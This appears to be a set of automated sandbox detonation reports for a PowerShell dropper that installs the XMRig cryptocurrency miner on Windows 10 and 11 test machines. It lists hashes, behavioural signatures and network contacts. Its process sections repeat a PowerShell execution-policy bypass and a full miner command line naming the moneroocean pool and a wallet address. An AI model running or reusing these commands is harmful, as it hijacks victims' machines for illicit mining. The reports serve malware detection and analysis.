C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4388 wrote to memory of 1124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4388 wrote to memory of 1124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yojgzg5s.ilz.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4388-25-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp
memory/4388-48-0x000002B2D7C80000-0x000002B2D7C92000-memory.dmp
memory/4388-61-0x000002B2D7AE0000-0x000002B2D7AEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:02
Platform
win11-20240611-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3740 wrote to memory of 1520 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3740 wrote to memory of 1520 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.227.13:443 | | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/3740-0-0x00007FFE8AE73000-0x00007FFE8AE75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jt1ogb5c.uld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:10
Platform
win11-20240419-en
Max time kernel
1788s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 2380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4888 wrote to memory of 2380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4888-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4cgyxzz.ecm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral31
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:11
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4600 wrote to memory of 400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4600 wrote to memory of 400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2816,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=2312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 199.232.210.172:80 | | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4600-0-0x00007FFD40393000-0x00007FFD40395000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdpiugzi.bpn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240611-en
Max time kernel
1796s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1972 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1972 wrote to memory of 4556 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_isxlfegc.wfa.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5000 wrote to memory of 4400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5000 wrote to memory of 4400 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
